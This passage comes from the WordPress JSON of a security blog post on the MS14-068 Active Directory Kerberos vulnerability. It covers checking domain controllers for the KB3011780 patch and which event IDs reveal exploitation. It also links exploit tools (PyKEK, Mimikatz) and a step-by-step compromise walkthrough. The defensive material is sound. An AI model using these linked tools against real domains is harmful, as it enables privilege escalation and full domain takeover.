I uploaded a sample script for getting the KB3011780 patch status for all Domain Controllers: <a href=\"https:\/\/adsecurity.org\/wp-content\/uploads\/2014\/12\/Get-DCPatchStatus.txt\">Get-DCPatchStatus<\/a> (change file extension to .ps1)<\/li>\n<li><strong>[Unpatched DCs]<\/strong> Monitor event ID 4672 for users who are not members of domain-level admin groups (<a href=\"https:\/\/adsecurity.org\/?p=272\">default groups able to log on to Domain Controllers<\/a> &#8211; this is why you shouldn&#8217;t use these default, built-in groups for delegation of administration):\n<ol>\n<li>Enterprise Admins (admin on all DCs in the forest)<\/li>\n<li>Domain Admins<\/li>\n<li>Administrators<\/li>\n<li>Server Admins<\/li>\n<li>Backup Operators<\/li>\n<li>Account Operators<\/li>\n<li>Print Operators<\/li>\n<li>Other groups delegated in your environment to log on to Domain Controllers<\/li>\n<\/ol>\n<\/li>\n<li><strong>[Patched DCs]<\/strong> Monitor event ID 4769 (Kerberos Service Ticket Operation), which shows failed attempts to get Kerberos service tickets (TGS).<\/li>\n<\/ol>\n<p>&nbsp;<\/p>\n<h3><span style=\"text-decoration: underline;\"><strong>References:<\/strong><\/span><\/h3>\n<ul>\n<li><a href=\"https:\/\/adsecurity.org\/?p=660\">MS14-068 Kerberos Vulnerability Privilege Escalation POC Posted (PyKEK) <\/a><\/li>\n<li><a href=\"https:\/\/adsecurity.org\/?p=556\">Mimikatz and Active Directory Kerberos Attacks <\/a><\/li>\n<li><a href=\"https:\/\/adsecurity.org\/?p=574\">MS14-068: Active Directory Kerberos Vulnerability Patch for Invalid Checksum <\/a><\/li>\n<li><a href=\"https:\/\/adsecurity.org\/?p=541\">Kerberos Vulnerability in MS14-068 Explained <\/a><\/li>\n<li><a href=\"https:\/\/adsecurity.org\/?p=525\">MS14-068: Vulnerability in (Active Directory) Kerberos Could Allow Elevation of Privilege <\/a><\/li>\n<li>The Python script MS14-068 POC code: <a href=\"https:\/\/github.com\/bidord\/pykek\">Python Kerberos Exploitation Kit<\/a> (PyKEK)<\/li>\n<li><a 
href=\"http:\/\/blog.gentilkiwi.com\/\">Benjamin Delpy\u2019s blog<\/a> (<a href=\"https:\/\/translate.google.com\/translate?sl=fr&amp;tl=en&amp;js=y&amp;prev=_t&amp;hl=en&amp;ie=UTF-8&amp;u=http%3A%2F%2Fblog.gentilkiwi.com%2F&amp;edit-text=\">Google Translate English translated<\/a> version)<\/li>\n<li><a href=\"https:\/\/github.com\/gentilkiwi\/mimikatz\">Mimikatz GitHub repository<\/a><\/li>\n<li><a href=\"https:\/\/github.com\/gentilkiwi\/mimikatz\/wiki\">Mimikatz Github wiki<\/a><\/li>\n<li><a href=\"http:\/\/blog.gentilkiwi.com\/downloads\/mimikatz-rmll.pdf\">Mimikatz 2 Presentation Slides<\/a> (Benjamin Delpy, July 2014)<\/li>\n<li><a href=\"http:\/\/blog.gentilkiwi.com\/presentations\">All Mimikatz Presentation resources on blog.gentilkiwi.com<\/a><\/li>\n<li><a href=\"https:\/\/www.trustedsec.com\/december-2014\/ms14-068-full-compromise-step-step\/\">From MS14-068 to Full Compromise \u2013 Step by Step<\/a> [TrustedSec]<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>MS14-068 References: AD Kerberos Privilege Elevation Vulnerability: The Issue Detailed Explanation of MS14-068 MS14-068 Exploit POC with the Python Kerberos Exploitation Kit (aka PyKEK) Detecting PyKEK Kerberos Packets on the Wire aka How the MS14-068 Exploit Works After re-working my lab a bit, I set about testing the MS14-068 POC that Sylvain Monn\u00e9 posted to &hellip; <\/p>\n<p><a class=\"more-link btn\" href=\"https:\/\/adsecurity.org\/?p=676\">Continue 
reading<\/a><\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,2],"tags":[20,380,101,59,337,80,81,331,298,207,295,334,333,697,332,22,329,330],"class_list":["post-676","post","type-post","status-publish","format-standard","hentry","category-microsoft-security","category-technical-reference","tag-activedirectory","tag-cve-2014-6324poc","tag-domaincontroller","tag-kalilinux","tag-kb3011780","tag-kdc","tag-kerberos","tag-kerberoschecksumvulnerability","tag-kerberoshacking","tag-mimikatz","tag-ms14068","tag-ms14068exploit","tag-ms14068exploitcode","tag-pac","tag-poc","tag-powershellcode","tag-pykek","tag-pythonkerberosexploitationkit","item-wrap"],"_links":{"self":[{"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/posts\/676","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/adsecurity.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=676"}],"version-history":[{"count":49,"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/posts\/676\/revisions"}],"predecessor-version":[{"id":2647,"href":"https:\/\/adsecurity.org\/index.php?rest_route=\/wp\/v2\/posts\/676\/revisions\/2647"}],"wp:attachment":[{"href":"https:\/\/adsecurity.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=676"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/adsecurity.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=676"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/adsecurity.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=676"}],"curies":[{"name":"wp","href":"https:\/\/api.w.o
rg\/{rel}","templated":true}]}}